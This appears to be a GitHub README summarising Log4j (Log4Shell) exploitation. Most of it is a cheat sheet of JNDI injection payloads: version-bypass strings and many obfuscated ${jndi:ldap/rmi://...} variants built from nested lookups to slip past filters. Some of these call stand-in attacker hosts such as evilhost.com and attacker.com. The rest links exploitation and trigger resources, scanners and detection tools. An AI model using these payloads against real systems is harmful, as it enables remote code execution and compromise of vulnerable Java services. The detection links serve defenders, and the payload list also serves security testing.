1.绕过rc1版本
${jndi:ldap://127.0.0.1:1389/ badClassName}
${jndi:ldap://127.0.0.1#.evilhost.com:1389/a} vcenter利用
2.绕过方式
${${env:aaaa:-j}${env:aaaa:-n}${env:aaaa:-d}${env:aaaa:-i}:${env:aaaa:-l}${env:aaaa:-d}${env:aaaa:-a}${env:aaaa:-p}${env:aaaa:-:}//
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${${aaa:bbb:-j}ndi:rmi://{{interactsh-url}}/poc}
${${:::::::::-j}ndi:rmi://{{interactsh-url}}/poc}
${${:p:q::zz::::::::-j}ndi:rmi://{{interactsh-url}}/poc}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
jn${env::-}di:
jn${date:}di${date:':'}
j${k8s:k5:-ND}i${sd:k5:-:}
j${main:\k5:-Nd}i${spring:k5:-:}
j${sys:k5:-nD}${lower:i${web:k5:-:}}
j${::-nD}i${::-:}
j${EnV:K5:-nD}i:
j${loWer:Nd}i${uPper::}
3.利用
不同应用的触发方式:https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j
影响产品:https://github.com/cisagov/log4j-affected-db
通过header去扫描:https://github.com/fullhunt/log4j-scan
4.检测
正则匹配:https://github.com/back2root/log4shell-rex
扫描本地包:https://github.com/hillu/local-log4j-vuln-scanner
-
Notifications
You must be signed in to change notification settings - Fork 1
Nan3r/log4j
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
About
总结log4j利用
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published